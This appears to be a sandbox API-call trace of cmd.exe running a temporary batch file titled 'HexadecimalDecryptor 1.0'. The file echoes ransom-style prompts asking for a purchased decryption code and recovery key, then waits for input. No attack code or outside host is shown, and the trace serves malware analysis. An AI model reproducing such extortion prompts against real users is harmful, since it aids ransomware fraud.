[0129.776] _wcsicmp (_String1="echo", _String2=")") returned 60 [0129.777] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0129.777] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0129.777] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0129.777] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0129.777] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0129.777] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0129.777] GetProcessHeap () returned 0x27eb56d0000 [0129.777] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0129.777] GetProcessHeap () returned 0x27eb56d0000 [0129.777] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1a) returned 0x27eb56d9780 [0129.778] GetProcessHeap () returned 0x27eb56d0000 [0129.778] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x6e) returned 0x27eb56daae0 [0129.778] _tell (_FileHandle=3) returned 171 [0129.778] _close (_FileHandle=3) returned 0 [0129.779] malloc (_Size=0xffce) returned 0x27eb5900160 [0129.779] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0129.780] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0129.780] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0129.780] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0129.780] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0129.780] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0129.780] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0129.780] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0129.780] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0129.780] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0129.781] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0129.781] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="Administrator: HexadecimalDecryptor 1.0") returned 0x29 [0129.974] malloc (_Size=0xffce) returned 0x27eb5910140 [0129.974] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0129.975] malloc (_Size=0xffce) returned 0x27eb5920120 [0129.975] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0129.976] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0129.976] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0129.976] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0129.976] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0129.976] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0129.976] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0129.976] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0129.976] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0129.976] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0129.976] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0129.976] ??_V@YAXPEAX@Z () returned 0x1 [0129.977] GetProcessHeap () returned 0x27eb56d0000 [0129.977] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xcc) returned 0x27eb56db4b0 [0129.977] GetProcessHeap () returned 0x27eb56d0000 [0129.977] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56db4b0, Size=0x6e) returned 0x27eb56db4b0 [0129.977] GetProcessHeap () returned 0x27eb56d0000 [0129.977] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56db4b0) returned 0x6e [0129.977] GetProcessHeap () returned 0x27eb56d0000 [0129.977] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x78) returned 0x27eb56db530 [0129.977] _vsnwprintf (in: _Buffer=0x7ff67b917f60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x9fd6d1ea18 | out: _Buffer="Enter the decryption code you have purchased!\r\n") returned 47 [0129.977] _get_osfhandle (_FileHandle=1) returned 0xc [0129.977] GetFileType (hFile=0xc) returned 0x2 [0129.977] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0129.978] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x9fd6d1e9a8 | out: lpMode=0x9fd6d1e9a8) returned 1 [0130.111] _get_osfhandle (_FileHandle=1) returned 0xc [0130.111] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x9fd6d1e9e8, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x9fd6d1e9e8*=0x2f) returned 1 [0130.334] ??_V@YAXPEAX@Z () returned 0x1 [0130.335] _get_osfhandle (_FileHandle=1) returned 0xc [0130.335] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0130.458] _get_osfhandle (_FileHandle=1) returned 0xc [0130.458] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0130.584] _get_osfhandle (_FileHandle=0) returned 0x8 [0130.584] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0130.735] SetConsoleInputExeNameW () returned 0x1 [0130.735] GetConsoleOutputCP () returned 0x1b5 [0130.854] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0130.854] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.096] ??_V@YAXPEAX@Z () returned 0x1 [0131.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0131.131] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0131.131] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.131] SetFilePointer (in: hFile=0x94, lDistanceToMove=171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0131.132] GetProcessHeap () returned 0x27eb56d0000 [0131.132] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56db530) returned 1 [0131.132] GetProcessHeap () returned 0x27eb56d0000 [0131.132] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56db4b0) returned 1 [0131.132] GetProcessHeap () returned 0x27eb56d0000 [0131.132] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0131.132] GetProcessHeap () returned 0x27eb56d0000 [0131.132] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0131.132] GetProcessHeap () returned 0x27eb56d0000 [0131.132] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0131.132] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.132] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0131.132] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x19b, lpOverlapped=0x0) returned 1 [0131.133] SetFilePointer (in: hFile=0x94, lDistanceToMove=173, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0131.133] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=2, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="\r\nho Enter the decryption code you have purchased!\r\n") returned 2 [0131.133] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.133] GetFileType (hFile=0x94) returned 0x1 [0131.133] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.133] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0131.133] GetProcessHeap () returned 0x27eb56d0000 [0131.133] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0131.133] GetProcessHeap () returned 0x27eb56d0000 [0131.133] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0131.133] _tell (_FileHandle=3) returned 173 [0131.133] _close (_FileHandle=3) returned 0 [0131.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0131.167] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0131.167] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.167] SetFilePointer (in: hFile=0x94, lDistanceToMove=173, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0131.167] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.167] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad [0131.167] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x199, lpOverlapped=0x0) returned 1 [0131.167] SetFilePointer (in: hFile=0x94, lDistanceToMove=180, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0131.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=7, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr=":home\r\nter the decryption code you have purchased!\r\n") returned 7 [0131.168] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.168] GetFileType (hFile=0x94) returned 0x1 [0131.168] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.168] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0131.168] GetProcessHeap () returned 0x27eb56d0000 [0131.168] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0131.168] GetProcessHeap () returned 0x27eb56d0000 [0131.168] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0131.168] _tell (_FileHandle=3) returned 180 [0131.168] _close (_FileHandle=3) returned 0 [0131.168] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0131.168] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0131.168] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.168] SetFilePointer (in: hFile=0x94, lDistanceToMove=180, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0131.169] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.169] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4 [0131.169] ReadFile (in: hFile=0x94, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x192, lpOverlapped=0x0) returned 1 [0131.169] SetFilePointer (in: hFile=0x94, lDistanceToMove=225, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe1 [0131.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=45, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="set /p password=Please Enter Recovery Key!:\r\nased!\r\n") returned 45 [0131.169] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.169] GetFileType (hFile=0x94) returned 0x1 [0131.169] _get_osfhandle (_FileHandle=3) returned 0x94 [0131.169] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe1 [0131.169] GetProcessHeap () returned 0x27eb56d0000 [0131.169] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0131.169] GetProcessHeap () returned 0x27eb56d0000 [0131.169] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0131.169] _wcsicmp (_String1="set", _String2=")") returned 74 [0131.169] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0131.169] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0131.169] _wcsicmp (_String1="IF", _String2="set") returned -10 [0131.169] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0131.169] _wcsicmp (_String1="REM", _String2="set") returned -1 [0131.169] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0131.169] GetProcessHeap () returned 0x27eb56d0000 [0131.169] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0131.169] GetProcessHeap () returned 0x27eb56d0000 [0131.169] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x18) returned 0x27eb56da080 [0131.169] GetProcessHeap () returned 0x27eb56d0000 [0131.169] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x62) returned 0x27eb56daae0 [0131.170] _tell (_FileHandle=3) returned 225 [0131.170] _close (_FileHandle=3) returned 0 [0131.170] malloc (_Size=0xffce) returned 0x27eb5900160 [0131.390] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0131.391] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0131.391] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0131.391] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0131.391] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0131.391] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0131.391] _wcsicmp (_String1="set", _String2="CD") returned 16 [0131.391] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0131.391] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0131.391] _wcsicmp (_String1="set", _String2="REN") returned 1 [0131.391] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0131.391] _wcsicmp (_String1="set", _String2="SET") returned 0 [0131.391] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="Administrator: HexadecimalDecryptor 1.0") returned 0x29 [0131.544] malloc (_Size=0xffce) returned 0x27eb5910140 [0131.544] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0131.545] malloc (_Size=0xffce) returned 0x27eb5920120 [0131.545] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0131.546] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0131.546] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0131.546] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0131.546] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0131.546] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0131.546] _wcsicmp (_String1="set", _String2="CD") returned 16 [0131.546] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0131.546] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0131.546] _wcsicmp (_String1="set", _String2="REN") returned 1 [0131.546] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0131.546] _wcsicmp (_String1="set", _String2="SET") returned 0 [0131.546] ??_V@YAXPEAX@Z () returned 0x1 [0131.547] GetProcessHeap () returned 0x27eb56d0000 [0131.547] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb4) returned 0x27eb56db4b0 [0131.547] GetProcessHeap () returned 0x27eb56d0000 [0131.547] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56db4b0, Size=0x64) returned 0x27eb56db4b0 [0131.547] GetProcessHeap () returned 0x27eb56d0000 [0131.547] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56db4b0) returned 0x64 [0131.547] wcsncmp (_String1="/", _String2="/", _MaxCount=0x4) returned 0 [0131.547] GetProcessHeap () returned 0x27eb56d0000 [0131.547] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x6a) returned 0x27eb56db530 [0131.548] _wcsnicmp (_String1="/p", _String2="/A", _MaxCount=0x2) returned 15 [0131.548] _wcsnicmp (_String1="/p", _String2="/P", _MaxCount=0x2) returned 0 [0131.549] GetProcessHeap () returned 0x27eb56d0000 [0131.549] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x5c) returned 0x27eb56db5b0 [0131.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0131.549] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x9fd6d1e194 | out: lpMode=0x9fd6d1e194) returned 1 [0131.751] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0132.017] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0132.017] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x9fd6d1e198 | out: lpMode=0x9fd6d1e198) returned 1 [0132.225] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1e7) returned 1 [0132.418] _get_osfhandle (_FileHandle=1) returned 0xc [0132.418] GetFileType (hFile=0xc) returned 0x2 [0132.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0132.418] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x9fd6d1e078 | out: lpMode=0x9fd6d1e078) returned 1 [0132.724] _get_osfhandle (_FileHandle=1) returned 0xc [0132.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x9fd6d1e0b0 | out: lpConsoleScreenBufferInfo=0x9fd6d1e0b0) returned 1 [0132.839] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2371, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1") returned 0x2 [0132.840] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2371, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x9fd6d1e150 | out: lpBuffer="Please Enter Recovery Key!:") returned 0x1b [0132.840] WriteConsoleW (in: hConsoleOutput=0xc, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x9fd6d1e0a0, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x9fd6d1e0a0*=0x1b) returned 1 [0132.997] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8 [0132.999] GetFileType (hFile=0x8) returned 0x2 [0132.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0132.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x9fd6d1e0d0 | out: lpConsoleScreenBufferInfo=0x9fd6d1e0d0) returned 1 [0133.215] ReadConsoleW (hConsoleInput=0x8, lpBuffer=0x9fd6d1e1a0, nNumberOfCharsToRead=0x3ff, lpNumberOfCharsRead=0x9fd6d1e190, pInputControl=0x9fd6d1e0c0) Thread: id = 52 os_tid = 0x428